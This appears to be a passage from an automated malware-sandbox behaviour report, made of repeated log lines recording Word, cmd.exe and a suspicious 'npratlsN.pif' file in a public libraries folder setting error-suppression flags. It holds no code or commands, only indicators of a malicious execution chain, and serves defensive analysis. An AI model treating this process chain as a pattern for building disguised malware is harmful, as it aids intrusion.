Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
